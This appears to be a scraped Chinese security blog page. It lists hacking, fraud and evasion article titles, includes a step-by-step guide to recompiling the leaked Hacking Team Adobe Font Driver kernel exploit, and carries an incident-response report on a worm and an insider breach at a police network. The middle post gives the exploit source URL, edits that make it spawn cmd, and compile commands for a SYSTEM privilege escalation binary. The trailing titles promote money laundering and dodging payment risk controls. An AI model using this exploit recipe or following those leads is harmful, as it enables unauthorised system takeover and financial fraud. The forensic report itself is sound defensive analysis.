注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪 浅谈怎样保住数据最后的贞操 移动自助终端未授权访问-通杀丽江 如何看两个ip是不是在一个机房,路由追踪 逆向追踪之:网站被挂淘客跳转以后发生的事情 病患信息遭泄露 骗子假扮医生短信要红包 “联通3G无限 流量卡”淘宝上这种无限流量的卡可信度有多少? 【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗? “伪基站”任意冒用手机号短信诈骗 让支付简单一点 为抓小偷 俄警方在地铁安装能读取乘客手机信息的设备,这是啥技术? 一次蜜罐社工套0day! 山西破获首起“伪基站”案件 逆向爆菊、反向追踪之:追查史上最奇葩的“挂马”黑客! 物理设备安全大牛 Barnaby Jack 挂了... 保护自己之手机定位信息收集 技术讨论: 楼宇广告终端 怎么破? 入侵户外广告大屏幕! 请教关于手机IMEI定位的问题 安全跑路指南2013之乌云版【连载中】 一种巨猥琐的挂马方法、超淫荡的APT攻击思路:如果这么挂马会不会挂进内网 (视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing 腾讯泄露隐私?看卫士哥获得女神的好友的名单,社工可能认识的人! 发两个qq钓鱼站点 求测试 - 乌云白帽子 XSS 实例 刚刚看到个鱼站,然后就被轮流爆菊了…… 如何设置安全的密码 小型APT之看我如何入侵电视,我是如何入侵智能电视的 全面披露华硕十款无线路由器 - AiCloud启用单位的多个漏洞 应用安全思维系列之一:如何保护密码才安全 一张随意拍摄的波士顿马拉松比赛照片,如何帮助FBI破案 我们是如何通过一张照片定位到疯狗位置的 针对莱特币的新木马被发现 Carberp源代码泄露后续——黑掉黑客 黑市交易 – 女性肉鸡价格比男性贵100倍 使用电视棒接收飞机信号 简单的实现方法 超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她 R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B) rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪 淘宝钓鱼诈骗,如今淘宝各个分支产业对网民不利的分支缺陷 黑客改造脑波耳机,让您可以通过思想控制建筑物 针对性攻击与移动安全漏洞 视频: Dtac:将宠物变成了WiFi热点,泰国运营商将宠物变成WiFi热点 户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机) 视频: 可以用手势控制的Wi-Fi:WiSee 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件! WIFI信号可用于识别身体姿势 再次遭遇 GoTop 挂机刷钱“病毒”,逆向爆菊,追踪背后“牧马人” 公共无线安全——FakeAP之WiFi钓鱼 DNS域传送信息泄露 GNU Radio USRP OpenBTS 小区短信 区域短信 一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截 如何抵御社工库类的黑客攻击?在明文密码已泄露的情况下保护自己? 钓鱼之XSIO漏洞,一个非常猥琐的“漏洞” 54dns劫持实现dns钓鱼攻击威胁? 监听空中的无线电,监听polices对讲机 0x80c IRC 网络安全匿名聊天室 上海伊莱美医院被黑、黑帽SEO做淘宝客,核总深入追查,揪出内鬼! 支付宝木马爆菊过程总结帖【附源码】 接上一章节,支付宝木马,后续情节【2】 高级钓鱼攻击来了:针对拍拍的XSS攻击 接上一章节,支付宝木马,后续情节 360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花 周末湖边 Sniffing ADS-B,Hack 私人小型机场 一种猥琐方式的对攻击者定位(观315有感) 关机后仍能提取出内存中的关键信息,计算机关闭后内存数据泄露 国外发现中国针对美国无人机厂商的APT攻击 中国是全球最大的的APT攻击来源 揭秘诈骗千万人民币的团伙及具体位置分析 淘宝又见好东西,低价格钓鱼几个倒霉蛋骗到手大额的款项,跑路、关店 核总霸气分析“天津丽人女子医院”主站被黑、挂淘宝客、黑帽SEO全过程! 如何用Android智能手机劫持一架飞机(PPT下载) 中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码,上门砍人 接着核总的《打击钓鱼,人人有责》之后的故事... 打击钓鱼,人人有责…… 研究人员首次发现用于针对性攻击的Android木马 V,背后的故事 + 网友细致分析讨论 + 核总终极点评 【跟风贴】XSS挖出一个黑产团体 XSS挖出一个黑产团体 物理黑客户外硬件入侵之:某咖啡厅的广告展示终端…… 陌陌猥琐流定位妹纸精准位置 有图有真相 + 安卓工具 [终端安全] 一种猥琐的通用绕过某些终端系统沙盒方法 追查黑客姓名,邮箱,支付宝信息,惊现大规模僵尸网络,要求警方介入处理! 服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码 [讨论]如何入侵一个户外的电子显示屏 耍了一个发给我网购木马的骗子~~ Base64 格式的密文,Base64 方式的 MD5 密匙,一些编码知识 几种常见的hash加密,怎么判断hash的类型 Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入 农行网银体验机,自助终端权限绕过方法 android软件外加监控,隐私安全?!爆个一键root内幕! 关于手机的隐私保护。。 关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论 支付宝的设计问题 401钓鱼新玩法,反向401钓鱼 远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击 国外黑客团队,现在的定向攻击模式,高级渗透、社工,游戏托端 追踪PlugX Rat作者,人肉定向攻击远控PlugX开发者 dSploit—Android网络渗透套件测试小记(含视频) 实时抓取移动设备上的通信包(ADVsock2pipe+Wireshark+nc+tcpdump) FBI备忘录显示黑客成功入侵了商业HVAC工控系统 android 手机系统、平台渗透测试神器 dSploit 看新闻学知识之手机千里追回 西安丢iPhone定位在北京民警辗转2400公里追回 来福士等试点室内定位技术 定位GFW的python脚本,如何找到GFW设备的IP地址 电话诈骗手段升级 听按键音破译银行密码 路由器里的终端设备名带来的安全问题 银行等保之网银体验机安全测试 由社工妹子引发的C段沦陷,由社工妹子的引发的内网渗透一条龙 如果大量短信攻击会不会造成拒绝服务,导致手机接不进电话? 钓鱼网站诱骗支付占据网络不安全事件首位 武汉公安开发尖端人像识别系统 可瞬间辨认嫌疑人 全国摄像头寻人 终端机常见绕过沙盘方法、突破终端机屏幕锁定限制方法大全 东京大学加密招生海报解密过程(内含妹子) “钓鱼”网站横行:运营商与搜索引擎成帮凶 发现APT攻击的破绽 可能的拦截HTTPS加密通信的手段 破解Google Gmail的https新思路 试验无线网络监听 网络账户密码也可被获取 一个40位的“md5” 网曝银行卡密码“漏洞” 王鹏你妹“占领”北京地铁五号线屏幕,关于“王鹏你妹”的真相 北京地铁5号线所有电视屏显示“王鹏你妹”官方回应 谷歌获智能手表专利:原理似谷歌眼镜(图) 网上团购月饼支付变游戏点卡 钓鱼网站借此牟利 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 法国政府约谈Facebook称泄漏用户个人隐私 解密搜狗搜集用户信息的用途 Flightradar24 网站“直播”天上“堵飞机” 看全球实时航班 《魔兽世界》截屏数据水印惊现用户私人数据 截图隐藏水印 暗含玩家信息 某些搜索引擎超科幻搜索结果,泄露了不只一点点 简单分析一个通过 js 劫持进行黑帽 SEO 做淘宝客的案例 街机、捕鱼机、上分器、解码器、打码器、写码器、无线、遥控 美国试点超级无线网络 覆盖范围达数公里 iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器 Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗 iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号 找出 GFW 在 Internet 的位置、追踪 GFW 在互联网中的位置 视频:Sight 未来视网膜成像技术 科幻微电影 黑客攻击导致澳安全情报局网站,崩溃长达半小时 德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机 黑客在Defcon建立私人电话网络 - DEFCON 忍者 GSM 网络 支付宝错发中奖短信 送236台iPad2 网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 视频:如何动手改造iPhone添加无线充电功能 善用网站权限设置 莫让社交变“裸奔” 社交网络诱人沉迷 病态的自恋 瑞典研发新技术可让WiFi每秒传输2.5TB数据 著名编剧宁财神被遭遇钓鱼淘宝 被骗近万元 男子侵入上海移动平台群发广告短信牟利获刑 802.11b 无线网络固件级攻击、802.11b Firmware-Level Attacks 福布斯:IE10“禁止追踪”扼杀网络广告市场 如何加载 VMware Workstation v8.0.1 加密过的虚拟磁盘文件(vmdk) 谷歌放出首个由Google眼镜拍摄的视频 720P格式 美国秘密研制新概念网路武器 可攻击离线电脑 无线电信号渗透 Msnshell的那个有问题的官方下载链接追踪 手机全息投影、初音、Miku、立体投影,制作方法已放出,图文+视频 刷下“拉卡拉”卡里2万多块钱丢了,复制银行卡,POS机、刷卡黑客 病毒集团盯上网络购物 在淘宝上被诈骗5.46万元 看FBI是怎么网络钓鱼执法的 苹果欲建造内部食堂 防止保密信息泄露 华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕 视频:国外黑客无线入侵、遥控电子路桥系统 视频:国外黑客无线入侵保时捷911,并且远程操控、遥控 视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播 视频:国外黑客入侵高速公路交通电子屏 大屏系统被黑 泰国国会现场直播不雅照 美军投资新型隐形眼镜 可将信息投射到眼球上 利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备 电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍? Google开发扩展现实眼镜 基于Android系统运行 任何一种装机量巨大的软件,都有政府监控模块,我们应该如何保护自己? 美国色情网站遭黑客袭击 7.3万用户资料泄露 Mydecms 贤诚文章管理系统泄露数据库账号、密码、库名漏洞 惊爆“17岁少女黑客 fly”高清无码裸照!!这下你真的火了!!! 末世入侵行动 (Fire Sale!) 末日入侵行动 网络钓鱼危急行业发展 专家呼吁各方合力围剿 用 js 实现本地 md4、md5、sha1 加密表单并提交 视频:鬼佬的室内四轴定位系统,震惊,飞机模型能玩到如此地步! 互联网信息办公布用户信息泄露事件查处情况 2012年新浪微博用户密码泄露漏洞(图片解析) 黑客考虑发射通讯卫星对抗全球互联网监管 目前我认为是2011密码泄露事件最合理、最符合实际的一个解释 Tabnapping 浏览器标签劫持 用假冒浏览器标签进行钓鱼攻击 GSM蜂窝基站定位基本原理浅析 用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位 不要偷黑客的东西 - Why you don't steal from a hacker 索尼又遭黑客攻击 或致9万余份用户信息泄露 物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点 工程师网盗支付宝11万 开设79个账户转移盗款 【分析】腾讯独立域名QQ空间被钓鱼,腾讯官网被黑,被植入钓鱼页面! 男子信用卡绑定电话遭修改被盗刷7万元 国内各类 WebShell 密码大全 爆破、社工用 webshell-password VB Html编码、Html解码、Html加密、Html解密、Html转义字符 【转载】高级社工:从QQ空间可以暴露的信息 美国军方遭黑客袭击 泄露大量秘密信息 黑客的新目标:泄密其他黑客资料 国家计算机病毒中心发现新型蠕虫 即时聊天要当心 【视频】NRF24L01无线射频模块实现无线视频通讯实例 【视频】NRF24L01无线射频模块 实现无线视频通讯实例 艺电称旗下一网站遭攻击 用户资料泄露 CMCC【中国移动】无线热点破解思路 破解无线wifi密码后不能上网的问题解析 索尼承认1000万信用卡资料遭盗窃 索尼PSN数据被黑激怒全球客户 苹果iPhone和谷歌Android手机被曝"定位"用户 入侵者必读, 网警、公安是如何找到你的! 【视频】宝坻 - 历史上最胆大的银行劫匪 某人肉搜索的典型案例分析 一群推理神牛 囧事 知名反病毒厂商卡巴斯基源代码泄露 能直接在眼球上投影图像的隐形眼镜,智子? 呵呵,腾讯?QQ?网民隐私?公安监控? 360秘密收集用户信息日志文件大规模外泄 无银行卡,密码10万元1分钟转走,超级黑客? 【文章】10.3 通信信道加密 链对链 端对端 【文章】Winrar 压缩软件的加密算法 - AES 【文章】9.6 密码反馈模式 初始化向量 错误 【文章】9.3 密码分组链接模式 - 反馈寄存器 【文章】9.1 电子密码本模式 - 多重加密处理 【文章】8.10 密钥有效期 密钥破译 密文分析 【文章】8.9 泄露密钥 对称密码 私/密钥泄露 【文章】4.14 密钥托管 密钥托管的政治 安全 【文章】4.13 秘密的全或无泄露 ANDOS协议 【文章】应用密码学: 加密数字签名 重发攻击 【文章】应用密码学 - 隐写术代替和换位密码 【文章】应用密码学:前言 - 作者简介 - 目录 3389 远程桌面 Mstsc RDP协议详细解析 (下) 360,腾讯等公司之间的战争,以及网民用户隐私 扫描指定IP网段存在的网络摄像头、监控设备 【VB技巧】VB URL编码与解码 URL加密与解密 【VB技巧】VB Base64编码/解码/加密/解密 【Asp】ASP Unescape加密/解密/编码/解码 【漏洞】Microsoft IE CSS处理跨域信息泄露 【计算机常识】双机无线wifi互联教程 【技巧】用无线路由实现无线桥接 【工具】无线破解/渗透工具 Beini-1.2.1 渗透某餐厅无线点餐服务器 全套手机秘籍/手机指令 Nohl破解GSM加密算法的演示稿 GSM加密破解演示PPT(英文) 1479_26C3.Karsten.Nohl.GSM.pdf 留言评论(旧系统): 佚名 @ 2015-08-31 12:10:46 核大大我测试了下,请问这个错误怎么解决? http://7xkuze.com1.z0.glb.clouddn.com/QQ图片20150831121052.png 本站回复: 这个不太清楚。 佚名 @ 2015-09-13 20:43:55 同问 跟楼上遇到了同样的问题 本站回复: 不清楚。

2015/7/31
articleCard.readMore

Hacking Team Adobe Font Driver 提权 快速利用介绍

Hacking Team Adobe Font Driver 提权 快速利用介绍 三好学生 | 2015-07-15 11:22 0x00 目标 利用Hacking Team 的Adobe Font Driver内核漏洞代码,重新编译,获得系统权限。 0x01 测试环境 Windows 7 (32-bit) 0x02 样本分析 已知成功环境: WindowsXP~Windows 8.1,X86和X64 0x03 样本测试 无 0x04 简单修改 此处举例说明如何修改source_pie_7: 1、下载代码 http://ht.transparencytoolkit.org/gitlab/Windows-Multi-Browser/2_stage_shellcode_source/ 2、搭建开发环境 安装lcc.exe 3、修改文件 进入source_pie_7文件夹 编辑elevator.c: 去掉#include "font.h"(减小文件体积) 编辑loader.c: 添加#include "font.h"(添加字体文件) L104 calc改为cmd(执行calc改为cmd) 在void Loader()第三行插入memcpy(pVtable.lpLoaderConfig->foofont,foofont,755256);(赋值) 4、编译 compile.bat写入如下代码,运行后生成elevator.exe c:\lcc\bin\lcc.exe -c elevator.c c:\lcc\bin\lcc.exe -c loader.c c:\lcc\bin\lcclnk.exe -subsystem console -o elevator.exe elevator.obj loader.obj wtsapi32.lib crypt32.lib wininet.lib del elevator.obj elevator.exp elevator.lib del loader.obj loader.exp loader.lib 5、测试 [原文地址]

2015/7/15
articleCard.readMore

反黑逆向溯源追踪之:某某某局入侵事件分析

某某某局入侵事件分析 鬼魅羊羔 ((#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵) | 2015-07-15 09:59 其实是去年年底的事儿,最近又琢磨起这个病毒了,就想起来之前写的报告了,贴出来大家一起研究研究哈。。。 再不冒泡,估计会被剑心踢出去的。。。。 1 事件原因: 2014年12月23日,接到某市公安局电话,告知该市公安局公安网内部某重要数据库被篡改,需要协助进行分析取证。 12月24日早晨紧急赶到该市公安局,该单位负责人组织相关人员开会,简单的说明了下事件情况和特殊性,原来遭到篡改的数据库服务器,是存放XX信息的重要数据库,在发现入侵后,管理员第一时间备份了数据库的访问记录,数据库日志情况大致如下: 根据数据库日志显示,IP地址为10.xx.80.24客户端(PC机拥有人:张XX),在11月30日晚上11时左右到12月1日凌晨,连接了数据库,并删除了敏感数据,而且从该PC机日志中发现,10.xx.80.20服务器(一个考试服务器)曾经连接过该管理员PC,据此进行调查取证,过程如下: 注:10.xx.80.20为内网服务器,只提供单位内工作人员内部考核的功能,不提供外网服务。 2 取证过程: 一、25日上午到达机房进行询问和了解情况,当日下午16时左右,发现10.xx.80.20服务器日志被清除,从服务器上进行查看,发现日志与当日中午13时左右被清理,且在该服务器中发现大量黑客提权工具(cmd.exe、wsvr.exe等),以及ASP脚本网页木马等恶意文件和程序,据此判断,该服务器已经被入侵过,在检查中发现,网站IIS日志被删除,因此无法查到来源,根据25日上午在服务器中查看系统日志中发现,有大量IP地址曾尝试连接10.xx.80.20服务器,经过IP地址摸排,大部分IP地址均为服务器部分IP涉及个人PC电脑,根据线索,对所有的服务器进行了一次查看,发现所有服务器都有攻击行为记录,且相互攻击,进行弱口令扫描,关系图如下: 简单点说:比如管理员主机为A,10.xx.80.20主机为B,在管理员A主机日志中发现了B主机的大量尝试登陆信息,然后去B主机那查,发现以前的日志不见了,最新的日志里有C、D、E等N个个人PC和服务器登陆B主机的行为,然后挨个摸排C、D、E这些主机,在这些主机里又发现了A和B的攻击记录,总之很乱套……摸排下来,产生过攻击行为的服务器加个人主机,至少40多台。。。。。 而且,你会在A服务器中,发现B服务器的登陆记录,而B服务器登陆A服务器时采用的账户名,是B服务器独有的,其他服务器也类似……好吧,说不清楚了,我下面详细说吧- - 根据如上关系图,初步认为有大量主机被控制,对内网主机进行扫描。 下图为10.xx.80.20服务器部分日志截图:证明有服务器尝试破解管理员账户口令,疑似已经沦为肉鸡。 注:这是初步认为,但是后来我发现,自己想的太简单了。。。。。 并且在该服务器中,发现大量的尝试登陆信息,用户名皆为ANONYMOUS LOGON,如下图: 当我接入个人PC在该网络内的时候,发现自己的电脑日志里也出现了N多的尝试登陆信息,用户名皆为ANONYMOUS LOGON,而虚拟机也有该问题,虚拟机还跟自己不是一个网段,用的是VM1网卡。 我开始怀疑,这个攻击来源,是来自于网络内部,而且还在持续攻击着。 在对整个网络服务器进行排查的时候,发现某个服务器,任务计划中有一项可疑的任务计划,如下图: 正当我准备点击该任务计划,查看详情的时候,该任务计划忽然消失了。根据以往的经验,该任务计划肯定不是管理员自助创建的,理由有二: 1).任务计划中,At字母开头的,是代表后台进程执行后所产生的任务计划,也就是说,是通过命令行的方式进行创建出来的; 2).在手工创建任务计划时,是不会自动进行命名的,任务计划名称必须管理员手工填写,而手工填写的任务计划,不会以这样的特殊字母进行开头,如下图: 在手工创建时,必须选择你要执行该任务的程序,然后填写任务计划名称。 初步判断,是有程序在后台执行,并且创建了该任务计划,利用任务计划,执行某程序的方式,跟早些年windows NT、XP、2003等系统利用IPC$默认共享漏洞进行入侵的方式极为类似,为了验证自己的推论,在虚拟机中做了如下测试, 在windows2003服务器中,默认是开启IPC$、ADMIN$、C$这些默认共享的,虽然没有执行权限,但是依然可以利用该漏洞,在服务器中写入特定的程序,上图为建立IPC$空连接测试命令,返回“命令成功完成”,可以证明,在windows 2003系统中,该漏洞是默认存在的。 只是建立空连接的话,是没有任何危害的,假如管理员的密码为弱口令,该漏洞就会造成很大的影响,命令执行过程如下图: 根据实际测试,windows2008在不打任何补丁的情况下,只要存在弱口令,同样可以通过IPC$去写入。当时测试了win7、windows2008、windows2003系统,win7的我忘了,反正2008和2003都能执行。。 通过测试,发现利用该漏洞添加的任务计划,与之前发现的名字为“At1”的任务计划一样,而且在服务器日志中发现,在利用该漏洞添加任务计划后,会留有ANONYMOUS LOGON的登陆信息,由此可疑确定,该网络中,有部分主机存在该默认共享漏洞,而且有东西在利用该漏洞执行某些特定的程序。 通过该线索,对网内所有可访问到的服务器和个人PC进行排查,发现大部分服务器除了都有攻击行为以外,还存在弱口令、以及默认共享没有关闭、未安装补丁和杀毒软件等共同问题,而且在10.xx.80.123服务器中,发现有可疑任务计划,该任务计划在特定时间内,会执行cool_gamesetup.exe程序,且通过IPC$默认共享漏洞进行传播,经过反复测试,已确定大部分服务器都存在该高危漏洞,其中包括windows2003、windows2008等系统,如下图: 将该病毒备份后,放置虚拟机中进行动态,发现该病毒在虚拟机中,会自动进行复制,并且会对局域网中所有已存活的主机进行弱口令扫描以及漏洞探测,下图为虚拟机环境中测试结果: 其中:192.168.226.127为感染病毒主机,一旦染毒,就会向同网段的192.168.226.128发送数据包 并且访问其137、139端口。 上图为该病毒利用IPC$共享漏洞进行传播的过程 上图为病毒读取注册表项,来获取服务器名称。该病毒会读取受感染主机的计算机名称,然后获取该服务器用户信息,并利用在受感染主机中获取到的用户名对网段内所有存活主机进行暴力破解。 动态分析完了,用静态分析看下,, 通过PEID检查,发现该病毒做了加壳操作 再一次用depends来确认,确实是加了壳,还是EXECrypor,加了壳后,加载的动态函数都看不到了。 脱这个壳很简单,通过简单的单步跟踪法进行脱壳,三步就能到达真正的OEP,地址:OEP地址0005E88F 脱壳后进行修复,并载入depends再次查看,这次发现,该病毒加载的动态函数全部呈现出来了,加载了哪些功能,也就一清二楚了。 加载的这些功能我就不说了,毕竟又不是远控= = 在OD中,发现,该病毒执行后会push到开机启动项当中 根据测试结果,服务器一旦感染该病毒,该病毒会自动向同网段服务器发送数据包,进行弱口令扫描,并且连接TCP 137端口,获取当前服务器的计算机名,向其他服务器发起攻击,如果发现有服务器存在IPC$共享漏洞,则进行传染。 在测试结果中发现,该病毒会定期自动删除系统日志,时间不固定,具体删除日志的触发条件不明。 该病毒在测试中有三种不同的功能: 1、利用IPC$共享漏洞进行传播,并且扫描内网中存在弱口令的主机,如果存在弱口令,则继续利用IPC$共享漏洞传播; 2、在域环境下,病毒会拷贝硬盘下所有的文件,并且会在C盘根目录自动生成myrarwork的一个目录,将服务器上的文件都复制到该目录下,然后将搜集到的文件,复制到C:\Documents and Settings\Administrator\My Documents\目录下的TEMP文件夹下后,该文件夹会被自动执行删除操作,根据实际测试,并没有发现上传的迹象,而原来的文件,也没有被做替换,初步怀疑,需要触发某些条件,才会进行上传。。 3、在安装有SecureCRT的服务器上,会在SecureCRT的安装目录中的sessions文件夹中,自动生成名字为某某zfw(某某政法网)的文件夹,会持续生成一些IP地址和信息,包括各个地市的信息,确认了一部分,这些IP地址均为交换机、路由器地址,具体生成原因以及目的不明。 下图为该病毒在虚拟机中的测试结果: 这是病毒释放出来的东西,看起来好有针对性。。。。 测试结论:1、该漏洞是利用windwos系统中远程共享来实现传播和控制,主要运行环境为局域网,受影响的系统为XP、windows2003、windows2008等服务器,win7系统默认共享权限为只读,win7系统不在影响范围之内。从上述判断中,基本可以确定,10.xx.80.20等服务器上的攻击日志,与管理员张XX(PC为10.xx.80.24)并没有直接关系,已经排除攻击者利用服务器做跳板,访问10.xx.80.24主机的可能;2、该病毒除了利用漏洞进行传播、破坏以外,还带有信息搜集的操作,具体原因不明。初步判断认为,该病毒极有可能为定制的病毒,搜集公安网内的IP段,具有一定的针对性。 根据管理员的口述,他所管辖的几十台服务器全部都是通用密码,包括自己的办公电脑,管理密码有三,***123、***gaj、123456等三个弱口令密码。正是因为这三个弱口令,才使得该病毒在内网中迅速蔓延起来,初步统计,受该病毒影响的服务器和个人PC,将近20多台。 在排除了攻击者利用肉鸡进行攻击的情况下,调查方向再次转到管理员张XX的个人办公PC上。 三、通过对张xx主机的系统日志进行分析如下: 2014年11月20日14:29分,系统开机 2014年11月26日8:26分 系统关机 2014年11月26日8:35分系统开机,一直到12月2日0点为止,未出现关机的操作,也就是说,该PC一直处于24小时开机状态。 11月27日晚上21:25分,出现一次本地解锁操作,一直到12月1日下午16:17分未出现其他登陆信息。 同时,在日志中并没有发现与删除记录时间相符的远程登陆记录,故排除远程桌面连接的情况。 数据库日志分析: 通过对oracle日志进行分析,11月30日21:05分连接成功,22:16分数据删除成功,23:19分09秒到23:33分08秒,平均每秒连接次数达到3-5次,查询以往几个月的数据库链接信息,最多出现1秒钟2次-3次连接,相比之下,没有30日连接频繁,数据库访问异常频繁,初步怀疑是暴力破解工具所为。。 但是在出现疑似暴力破解的日志前,已经有日志显示,数据库已经被成功登陆进去了,怎么还有会出现破解呢?? 12月31日,对管理员张XX的内网办公PC进行进一步分析,发现该电脑中,连接数据库的工具日志,确实显示该PC在11月30日到12月1日凌晨有访问数据库的操作,所有的证据,都指向了该管理员的PC。 利用相关的取证工具进行取证,发现该管理员张XX的PC,与晚上22点左右有使用过光驱的操作,并且在光驱中打开了一个名字为2.rar的文件夹,并且释放过4个脚本文件,具体用途未知。 通过调取当天下午到凌晨的监控记录,发现张xx为晚上21点左右到达单位,凌晨3点左右离开单位,而在早晨7点左右,在该办公室的另一个IP地址上,有人登陆业务系统,查询被删除信息的操作,初步判断,在30日晚上到12月1日凌晨,有人在该办公室内利用管理员电脑,删改了数据。因为8楼和办公室均没有安装摄像头,所以无法准确判断当晚到凌晨,是谁在办公室使用电脑。且管理员张XX,对服务器和数据库服务器有绝对的控制权限,能直接删除数据库链接日志信息,如果该管理员所为,就不会存在数据库链接记录,而且监控显示,在事情发生时,该管理员并不在单位,故排除该管理员监守自盗的情况。 从目前所搜集到的信息,可以确定,攻击者是利用该PC机,直接登陆数据库进行操作的,具体是通过远程控制进行操作,还是直接在PC上进行控制,因为时间已久,而且U盘使用记录等操作被删除了,无法进行取证和定论,但是通过目前掌握的线索和内容,基本可以判断为,攻击确实来自IP地址为10.xx.80.24的主机。 删除记录时间为11月30日晚上到12月1日凌晨,发现问题时间为12月13号,接到电话的时间为12月23日上午,到达现场的时间为12月24日上午,中间间隔时间较长,且接触该PC机的人太多,无法从键盘、光驱等位置提取指纹线索,无法直接获取有力证据。 在12月27日左右,监控到12月1日凌晨被删除的信息,在下面的另一个派出所做了登记补录,找到链接IP地址后,到该派出所进行调查,发现出事IP为一台硬盘录像机的地址,由于该网络内并没有限制或记录MAC地址的功能,任何电脑,只要将公安网内网网线拔出,接入到个人PC后,即可伪造IP地址进行操作,因此推断,该案件为内部人所为,且为团伙作案,涉及面太广,暂时宣告终结。 总结:由于事发时间与通知调查时间相隔近1个月,大部分痕迹已无法提取,楼道和机房也没有任何的监控设备,无法准确找到入侵者的准确信息,任务宣告失败。 总体的经过就是这样。。。。 我贴出这个病毒的检测报告,当然了,不是我检测的,是文件B超系统这个东西检测的,感兴趣的可以看看哈。。 检测报告:https://www.b-chao.com/index.php/Index/show_detail/Sha1/4B013CE950A22E5CE0909A66194063BEF8804F4A [原文地址] 相关内容: JS绕过代理、VPN获取真实IP及内网IP,逆向追踪 简单获取CDN背后网站的真实IP,CDN逆向,反向跟踪网站真实IP JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪 社会工程学追踪 妻子花6万挖出小三 给60多个号充话费锁定4人 逆向追踪一起针对国内企业OA系统精心策划的大规模钓鱼攻击事件 警察说:电话诈骗中,骗子存在哪些漏洞 渗透道哥的黑板报里那个骗子网站,入侵电话诈骗的骗子网站 同事亲历的一次电话诈骗 【警惕】一个神秘电话,工商银行卡内余额不翼而飞!网银诈骗! 论黑产黑阔如何安全地转移赃款/洗钱? 论匿名转帐和转移资产的可能,如何:网络匿迹、匿名洗钱、转移资产系统 跨行、跨省银行卡间转账不用手续费?利用支付宝为什么不收手续费? 如果躲开支付宝风险监控,何才能做到不违反支付宝风控条件呢? 网络匿迹、逆向追踪:关于那些做H站的人,是怎么落网的? APT攻击:境外间谍“飞哥”假扮女网友策反境内人员 窃取中国军事秘密 基于行为特征识别的网络诈骗嫌疑人追踪系统 逆向追踪,反向爆菊:在服务器上发现了挖矿程序,求爆菊姿势 【愚人节分享】一个钓鱼方法【测试几分钟有成功案例】 多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己 基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线? 揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息 支付宝存漏洞 嫌犯伪造执照盗刷网店20余万 DedeCMS 注入漏洞批量入侵爆菊 Exp 进入了路由器怎么让她进入我的钓鱼网页? 一起网络诈骗案的风险揭示,套取用户信息、信用卡、支付宝、快捷支付洗钱 如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪? 江西男子克隆国外银行卡刷513万 给两任女友395万 跨境盗刷信用卡 支付宝/淘宝帐号无需密码登录任意帐号,随意查看用户资料/交易记录/转账洗钱 个人认为微信支付存在的安全问题,同一银行卡多重绑定,恶意盗刷 关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己 浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉 【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工 俄罗斯黑客被曝潜伏Facebook,搭建蜜罐监视tor网络数据 保护水表:关于tor和mac地址的疑问,各位进来讨论一下,反追踪/匿迹 XX域名商实战,社工客服妹妹,毫不费力拿到目标公司内部通讯录 黑阔大牛来说一说切实可行的匿名上网方法 2000万条酒店开房数据泄露 男子婚事被搅黄 探秘时刻:多重身份的逃犯,不翼而飞的七百万,几百买身份证一票弄了700万 由“正方”jiam、jiemi之逆向思及Base64之逆编码表 针对工行诈骗黑产团伙的调查回忆录 开房数据泄露案告破 警方发现嫌犯曾参与多起网络犯罪 再论黑卡,黑吃黑,银行黑卡,超级网银签约直接转账 Liftoh木马钓鱼邮件正在进行时 物理攻击?那些年我们忽略掉的一些社会工程学手段 娱乐贴:看我如何逃避追查以及洗钱 我是这么设计高性能海量数(ku)据(zi)查询系统的(一) 看到有同学在问支付宝快捷支付漏洞--转一篇科普文章 全方位在互联网中保护自己第八章(如何留住数据的节操(上)) 